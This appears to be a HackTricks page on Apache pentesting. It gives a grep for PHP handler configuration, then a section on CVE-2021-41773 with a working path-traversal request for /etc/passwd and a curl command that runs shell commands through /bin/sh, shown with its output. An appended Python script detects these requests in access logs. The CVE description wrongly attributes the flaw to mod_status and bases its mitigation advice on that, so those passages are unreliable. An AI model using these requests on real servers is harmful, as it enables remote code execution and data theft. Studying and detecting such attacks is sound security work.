Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF, check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Executable PHP extensions
Check which extensions the Apache server executes. To search for them, you can run:
grep -R -B1 "httpd-php" /etc/apache2
Also, some places where you can find this configuration are:
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf
CVE-2021-41773
Description
Apache HTTP Server (httpd) is an open-source web server. A vulnerability, known as CVE-2021-41773, has been discovered in Apache HTTP Server versions 2.4.49 and prior. This vulnerability allows remote attackers to execute arbitrary code and gain unauthorized access to the targeted system.
Exploitation
To exploit this vulnerability, an attacker can send a specially crafted HTTP request to the server, targeting the vulnerable mod_status module. By including a path traversal sequence in the request, the attacker can access files outside the web root directory.
The following request can be used to exploit the vulnerability:
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: example.com
This request attempts to access the /etc/passwd file, which contains sensitive system information, such as user account details.
Mitigation
To mitigate this vulnerability, it is recommended to upgrade to Apache HTTP Server version 2.4.50 or later. Additionally, it is advised to restrict access to the mod_status module or disable it if not required.
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
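Detection logic for the two requests shown above, added here as an example and not part of the original page: it percent-decodes each request path from an Apache access log and flags paths whose `..` segments climb above the document root, plus paths that only spell `..` with encoded dots. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined log line: client ... "METHOD path PROTO" status
LOG_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A ".." path segment spelled with at least one percent-encoded dot
ENCODED_DOTS_RE = re.compile(r"(?:^|/)(?:\.%2e|%2e\.|%2e%2e)(?=/|$)", re.IGNORECASE)

def escapes_root(path):
    """True if the percent-decoded path climbs above the document root."""
    depth = 0
    for segment in unquote(path.split("?", 1)[0]).split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False

def classify(path):
    """Return 'escapes-root', 'encoded-dots', or None for a clean path."""
    if escapes_root(path):
        return "escapes-root"
    if ENCODED_DOTS_RE.search(path):
        return "encoded-dots"
    return None

def scan(lines):
    """Return (client, method, path, status, verdict) for each flagged line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        verdict = classify(m["path"]) if m else None
        if verdict:
            hits.append((m["client"], m["method"], m["path"], int(m["status"]), verdict))
    return hits

# Constructed sample lines (documentation addresses); paths 1-2 are the page's requests
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Oct/2021:10:00:01 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1024',
    '192.0.2.10 - - [05/Oct/2021:10:00:09 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 45',
    '192.0.2.44 - - [05/Oct/2021:10:01:13 +0000] "GET /docs/%2e%2e/index.html HTTP/1.1" 404 196',
    '192.0.2.77 - - [05/Oct/2021:10:02:30 +0000] "GET /index.html HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

An `escapes-root` hit logged with status 200 is the one to triage first, since the server returned content for that request.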